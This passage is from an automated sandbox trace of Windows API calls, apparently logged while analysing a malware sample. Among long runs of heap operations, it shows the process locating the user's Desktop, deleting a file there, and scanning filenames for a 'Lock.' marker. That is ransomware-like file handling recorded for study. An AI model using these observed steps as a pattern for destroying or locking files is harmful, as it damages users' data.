[0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0184.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0184.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0184.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0184.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0184.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0184.881] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0184.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0184.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0184.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0184.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0184.881] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0184.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0184.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0184.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0184.881] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0184.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0184.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0184.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0184.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0184.882] FreeLibrary (hLibModule=0x756e0000) returned 1 [0184.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0184.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0184.882] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0184.882] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0184.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0184.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0184.882] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0184.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0184.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0184.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0184.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0184.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0184.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0184.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0184.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0184.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0184.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0184.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0184.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0184.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0184.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0184.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0184.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0184.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0184.883] CloseHandle (hObject=0x2d0) returned 1 [0184.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0184.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0184.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0184.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0184.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0184.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0184.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0184.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0184.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0184.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0184.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0184.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0184.885] CloseHandle (hObject=0x2a0) returned 1 [0184.938] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0184.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0184.940] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0184.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0184.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0184.941] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0184.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0184.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0184.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0184.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0184.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0184.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0184.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0184.941] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/hkGbR.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\hkGbR.wav", lpFilePart=0x8cedf4*="hkGbR.wav") returned 0x21 [0184.941] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\hkGbR.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\hkgbr.wav")) returned 0x20 [0184.941] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\hkGbR.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebbda1a0, ftCreationTime.dwHighDateTime=0x1d5f024, ftLastAccessTime.dwLowDateTime=0xea16f120, ftLastAccessTime.dwHighDateTime=0x1d5eda0, ftLastWriteTime.dwLowDateTime=0xea16f120, ftLastWriteTime.dwHighDateTime=0x1d5eda0, nFileSizeHigh=0x0, nFileSizeLow=0x106d5, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="hkGbR.wav", cAlternateFileName="")) returned 0xa87110 [0184.941] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\hkGbR.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\hkgbr.wav")) returned 1 [0184.977] FindNextFileW (in: hFindFile=0xa87110, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebbda1a0, ftCreationTime.dwHighDateTime=0x1d5f024, ftLastAccessTime.dwLowDateTime=0xea16f120, ftLastAccessTime.dwHighDateTime=0x1d5eda0, ftLastWriteTime.dwLowDateTime=0xea16f120, ftLastWriteTime.dwHighDateTime=0x1d5eda0, nFileSizeHigh=0x0, nFileSizeLow=0x106d5, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="hkGbR.wav", cAlternateFileName="")) returned 0 [0184.977] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0184.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0184.977] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0184.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0184.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0184.978] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0184.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0184.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0184.978] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0184.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0184.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0184.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0184.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0184.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0184.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0184.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0184.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0184.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0184.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0184.978] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.978] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0184.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0184.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0184.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0184.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0184.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0184.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0184.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0184.979] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x44) returned 0x2e563a8 [0184.979] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/hkGbR.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\hkGbR.wav", lpFilePart=0x8cf650*="hkGbR.wav") returned 0x21 [0184.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0184.979] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\hkGbR.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\hkgbr.wav")) returned 0xffffffff [0184.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0184.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0184.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0184.979] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0184.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0184.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0184.980] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0184.980] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.980] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0184.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0184.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0184.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0184.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0184.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0184.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0184.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0184.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0184.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0184.980] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0184.980] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0184.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i48aq9pLiKOVw_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="48aq9pLiKOVw_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8aq9pLiKOVw_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aq9pLiKOVw_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q9pLiKOVw_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9pLiKOVw_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pLiKOVw_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LiKOVw_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iKOVw_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KOVw_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OVw_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vw_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="egcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gcT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cT3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0184.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0184.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0184.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0184.981] HeapFree (in: hHeap=0x970000, 